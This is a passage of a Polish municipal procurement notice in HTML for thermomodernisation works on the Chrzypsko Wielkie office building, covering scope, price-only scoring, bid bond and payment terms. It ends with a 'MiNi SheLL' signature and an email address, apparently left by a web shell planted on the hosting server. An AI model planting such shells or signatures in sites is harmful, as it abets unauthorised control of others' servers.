jako określenie żądanego standardu i jakości. - zamawiający dopuszcza rozwiązania równoważne opisanym.<br/>We wszystkich takich sytuacjach wykonawca może zaoferować równoważne materiały, produkty lub urządzenia o co najmniej takich samych parametrach. - wykonawca zobowiązany jest wykazać równoważność zastosowanych materiałów i rozwiązań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/>Cena (C) – waga kryterium 100%<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) – waga 100 %<br/>CN *<br/>C = ------------- x 100 pkt x 100 %<br/>CO<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>gdzie :<br/>C - oznacza liczbę punktów uzyskanych w kryterium cena oferty brutto (z dokładnością<br/>do dwóch miejsc po przecinku), 1 % = 1 pkt<br/>CN - oznacza cenę brutto najtańszej z ofert,<br/>CO - oznacza cenę brutto ocenianej oferty.<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>3. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opis przedmiotu zamówienia dla zadania<br/>„Termomodernizacja budynku Urzędu Gminy w Chrzypsku Wielkim.”<br/>Zakres realizowanego projektu:<br/>Instalacje sanitarne.<br/>Kody CPV:<br/>45331100-0 Instalacje centralnego ogrzewania<br/>45331200-8 Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych<br/>45332300-6 Roboty instalacyjne kanalizacyjne<br/>45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych<br/>1. Opis zamówienia.<br/>Przedmiotem zamówienia jest wykonanie: instalacji klimatyzacji, przebudowy kotłowni wraz z wymianą kotła i modernizacji części instalacji c.o. i c.w.u. w ramach termomodernizacji budynku Urzędu Gminy.<br/>2. Zakres elementów zadania:<br/>2.1. Wykonanie instalacji centralnego ogrzewania w zakresie przebudowy kotłowni z demontażem istniejącego kotła i montażem kotła gazowego oraz zbiornika na gaz.<br/>2.2. Wymiana zaworów grzejnikowych na termostatyczne i zwrotnych (patrz: projekt zamienny).<br/>2.3. Wykonanie instalacji klimatyzacji na kondygnacji parterowej budynku.<br/>2.4 Wymiana grzejników c.o. w pomieszczeniach poczty.<br/>Nie jest przedmiotem zamówienia (a jest ujęte w projekcie):<br/>1. Wykonanie instalacji centralnego ogrzewania ponad stropem nad piwnicą (patrz: projekt). Zakres wykonania instalacji c.o. obejmuje rozprowadzenie i włączenia poniżej stropu piwnicy (patrz: projekt, etap 1). Oprócz wymiany zaworów.<br/>2. Montaż zasobnika ciepłej wody użytkowej o poj. 200 l. Zamiast niego montaż zasobnika o poj. 100 l.<br/>3. Demontaż istniejącej instalacji rozprowadzającej centralne ogrzewanie pod stropem piwnicy.<br/>4. Roboty budowlane związane z pomieszczeniami kotłowni.<br/>3. W wyniku powyższego powstanie:<br/>- Instalacja centralnego ogrzewania z kotłownią gazową i zbiornikiem gazu.<br/>- Instalacja ciepłej wody użytkowej.<br/>- Instalacja klimatyzacji na kondygnacji parterowej budynku.<br/>4. Wytyczne dla wykonawcy:<br/>- wykonawca zobowiązany jest do dokonania wizji terenowej (na własny koszt) oraz do uzyskania wszelkich informacji niezbędnych do wyceny i wykonania tego zadania. Wizja terenowa powinna być odnotowana u zamawiającego.<br/>- przed zakupem potrzebnych elementów należy dokonać pomiarów z natury.<br/>- zamawiający wymaga, aby sposób prowadzenia zamówienia zapewniał utrzymanie ruchu i dojazd. Wykonawca zobowiązany jest do sporządzenia i przedłożenia zamawiającemu czasowego planu organizacji ruchu, jeżeli będzie to konieczne.<br/>Wszelkie opłaty wynikające ze szkód na etapie realizacji zamówienia ponosi wykonawca.<br/>5. Zasady zachowania konkurencyjności:<br/>- w przypadku, gdy w projekcie lub opisie przedmiotu zamówienia podano nazwy materiałów, produktów lub urządzeń konkretnych producentów, należy to traktować jako określenie żądanego standardu i jakości. - zamawiający dopuszcza rozwiązania równoważne opisanym. We wszystkich takich sytuacjach wykonawca może zaoferować równoważne materiały, produkty lub urządzenia o co najmniej takich samych parametrach. - wykonawca zobowiązany jest wykazać równoważność zastosowanych materiałów i rozwiązań. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45331100-7 - Instalowanie centralnego ogrzewania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45331200-8 - Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującym kryterium oceny ofert:<br/>Cena (C) – waga kryterium 100%<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C) – waga 100 %<br/>CN *<br/>C = ------------- x 100 pkt x 100 %<br/>CO<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>gdzie :<br/>C - oznacza liczbę punktów uzyskanych w kryterium cena oferty brutto (z dokładnością<br/>do dwóch miejsc po przecinku), 1 % = 1 pkt<br/>CN - oznacza cenę brutto najtańszej z ofert,<br/>CO - oznacza cenę brutto ocenianej oferty.<br/>a) Podstawą przyznania punktów w kryterium „cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2) W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>3. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z formularzem oferty (załącznik nr 1) Wykonawca zobowiązany jest dołączyć:<br/>1) aktualne na dzień składania ofert oświadczenie o braku podstaw do wykluczenia z postępowania na podstawie art. 108 ust. 1 i 109 ust. 1 pkt. 4, 5, 7 ustawy Prawo zamówień publicznych (Załącznik nr 3 do SWZ);<br/>2) W przypadku gdy wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu powoła się na zasoby innych podmiotów przy realizacji zamówienia do oferty załącza oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu (Załącznik nr 4 do SWZ);<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców – w/w oświadczenia składają każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia mają potwierdzać brak podstaw do wykluczenia.<br/>Oświadczenia, o których mowa w pkt. 1 – 3 składa się, pod rygorem nieważności w formie elektronicznej (kwalifikowany podpis elektroniczny) lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem osobistym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:<br/>- dla części 1 :14.000,00 zł (słownie: czternaście tysięcy złotych 00/100);<br/>- dla części 2: 3 000,00 zł (słownie: trzy tysiące złotych 00/100)<br/>- dla części 3: 3 000,00 zł (słownie: trzy tysiące złotych 00/100)<br/>2. Wadium wnosi się przed upływem terminu składania ofert.<br/>3. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Spółdzielczego Pojezierza Międzychodzko-Sierakowskiego o/Chrzypsko Wielkie nr rachunku<br/>09 9082 0005 0000 2479 2000 0030 z dopiskiem „Wadium – nr postępowania i części”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie p.z.p.<br/>2) z jej treści powinno jednoznacznej wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;<br/>3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert);<br/>5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6) beneficjentem poręczenia lub gwarancji jest: Gmina Chrzypsko Wielkie<br/>7) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 p.z.p.), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum);<br/>6. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p. zostanie odrzucona.<br/>7. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Wynagrodzenie i warunki płatności<br/>1. Za wykonanie przedmiotu umowy, określonego w § 1 niniejszej umowy, Strony ustalają wynagrodzenie ryczałtowe w wysokości: netto: ……………….. złotych (słownie:…………………………………………………………..) + VAT, brutto: ………………………… złotych (słownie:………………………………………………………………………..).<br/>2. Wynagrodzenie ryczałtowe o którym mowa w ust. 1 obejmuje wszystkie koszty związane z realizacją prac i robót objętych umową, w tym ryzyko Wykonawcy z tytułu oszacowania wszelkich kosztów związanych z realizacją przedmiotu umowy a także oddziaływania innych czynników mających<br/>lub mogących mieć wpływ na koszty.<br/>3. Nie przewiduje się możliwości wzrostu wynagrodzenia określonego w ust. 1 bez względu na zmianę stosunków. Wyjątek dotyczy zmiany wysokości wynagrodzenia należnego wykonawcy w przypadku zmiany stawki podatku od towarów i usług,<br/>4. Zgodnie z wymogiem udzielonej przez BGK – Wstępnej promesy dofinansowania inwestycji, Zamawiający udzieli Wykonawcy zaliczki w wysokości 20 % wynagrodzenia brutto wskazanego w § 3 ust. 1,<br/>na podstawie prawidłowo wystawionej i doręczonej przez Wykonawcę faktury zaliczkowej, w terminie<br/>30 dni od dnia jej doręczenia, na rachunek bankowy wskazany w fakturze.<br/>5. Wynagrodzenie Wykonawcy zostanie wypłacone po zrealizowaniu pełnego zakresu przedmiotu umowy na podstawie końcowej faktury VAT oraz zatwierdzonego przez Zamawiającego niezawierającego żadnych uwag protokołu odbioru końcowego robót podpisanego przez Wykonawcę, Inspektora<br/>i zatwierdzonego przez Zamawiającego oraz po przekazaniu Zamawiającemu decyzji pozwolenia<br/>na użytkowanie, zgodnie z ustawą Prawo budowlane, przy czym z kwoty faktury wystawionej<br/>po zrealizowaniu pełnego zakresu robót odliczona zostanie kwota udzielonej zaliczki.<br/>6. Faktura końcowa płatna będzie przelewem w terminie do 35 dni, licząc od daty otrzymania przez Zamawiającego prawidłowo wystawionej faktur VAT. Za datę zapłaty uważać się będzie dzień obciążenia rachunku bankowego Zamawiającego.<br/>7. Wykonawca zobowiązany jest do doręczenia Zamawiającemu faktury VAT wraz z dokumentami<br/>o których mowa w § 5 ust. 10 (jeżeli wykonuje roboty z udziałem podwykonawców), na co najmniej<br/>10 dni przed określonym na fakturze VAT terminem płatności a w razie niezachowania tego terminu, termin płatności wskazany w fakturze VAT zostanie automatycznie przedłużony o czas opóźnienia doręczenia faktury VAT.<br/>8. W przypadku przedstawienia przez Wykonawcę nieprawidłowo (w rozumieniu umowy i / lub przepisów<br/>o VAT) wystawionych faktur VAT, Zamawiający ma prawo odmówić ich przyjęcia bez negatywnych<br/>dla siebie konsekwencji. W takim wypadku objęte fakturami należności nie będą traktowane jako wymagalne i nie będą pociągać za sobą obciążenia Zamawiającego ewentualnymi odsetkami<br/>za opóźnienie w płatności.<br/>9. Faktury należy wystawić na: Gmina Chrzypsko Wielkie, ul. Główna 15, 64-412 Chrzypsko Wielkie,<br/>NIP: 595-146-12-75.<br/>10. Wykonawca nie ma prawa, pod rygorem nieważności, do przeniesienia wierzytelności z tytułu wynagrodzenia za zrealizowany przedmiot umowy na osobę trzecią (przelew, cesja) bez uprzedniej pisemnej zgody Zamawiającego. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Postanowienia umowy zawiera wzór umowy stanowiący Załącznik nr 7 do SWZ. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych we Wzorze Umowy. Przed podpisaniem umowy Wybrany Wykonawca poproszony zostanie o przedłożenie kosztorysu, w celu ustalenia kosztów poszczególnych elementów zamówienia.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 7 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej.<br/>5.	Ewentualne spory powstałe podczas i w związku z wykonywaniem niniejszej umowy, strony poddają rozstrzygnięciu Sądowi Polubownemu przy Prokuratorii Generalnej Rzeczypospolitej Polskiej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Pozostałe wymogi w SWZ</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-16 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamówienie ma być współfinansowane w ze środków Programu<br/>Rządowy Fundusz Polski Ład: Program Inwestycji Strategicznych.<br/>2. Zamawiający informuje, że złożenie oferty musi być poprzedzone odbyciem wizji lokalnej.<br/>W celu umówienia wizji lokalnej należy kontaktować się z osobami wyznaczonymi do komunikowania się z wykonawcami.<br/>Złożenie oferty bez odbycia wizji skutkuje odrzuceniem oferty na podstawie art. 226 ust. 1 pkt 18 p.z.p.

Creat By MiNi SheLL
Email: jattceo@gmail.com